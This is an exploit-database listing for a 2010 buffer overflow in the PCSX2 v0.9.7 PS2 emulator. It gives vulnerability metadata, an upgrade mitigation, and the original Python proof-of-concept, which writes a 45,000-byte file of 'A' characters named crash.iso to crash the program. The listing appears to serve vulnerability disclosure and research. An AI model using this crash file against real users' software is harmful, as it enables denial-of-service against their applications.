header-logo
Suggest Exploit
vendor:
PCSX2
by:
41.w4r10r
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: PCSX2
Affected Version From: 0.9.7
Affected Version To: 0.9.7
Patch Exists: YES
Related CWE: N/A
CPE: a:pcsx2:pcsx2:0.9.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 Eng
2010

PCSX2 v0.9.7 Crash

PCSX2 is a PS2 emulator to play PS2 Games on PC. This emulator is one of the popular among the gamers. A buffer overflow vulnerability exists in PCSX2 v0.9.7, which allows an attacker to crash the application by creating a file with 45000 bytes of data. This can be exploited by an attacker to crash the application.

Mitigation:

Upgrade to the latest version of PCSX2.
Source

Exploit-DB raw data:

# Exploit Title: PCSX2 v0.9.7 Crash
# Date: 08/11/2010
# Author: 41.w4r10r
# Version: 0.9.7

#Tested on : Windows XP SP2 Eng
# Software Link: http://pcsx2.net/downloads.php?p=publicbeta

#!/usr/bin/python
#PCSX2 is PS2 emulator to play PS2 Games on PC. This emulator is one of the
populer among the gamers.(It Works). PS2 Bios required to run this games.
print "--------------------Exploit By
41.w4r10r------------------------------\n"
print "-------------------41.w4r10r@gmail.com-----------------------------
\n"
print "----------------PCSX2 v0.9.7 PS2
Emulator------------------------------\n"
print "-------------Vendor Site :
http://pcsx2.net/-------------------------\n"
print "-------------Tested on Windows XP Sp2 Eng--------------------\n"
print "Greets: B0nd, nEo, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty,
vinnu, primary_key , Micr0 \n \n"
print "  Catch Us :  www.Garage4hackers.com \n \n"

print "Give Me 10Sec To create file :) \n"
junk = "A" * 45000;
filename = "crash.iso";
file = open(filename,"w")
file.writelines(junk)
file.close()
print "File Is created"
print "Press Any Key To Continue........."

raw_input()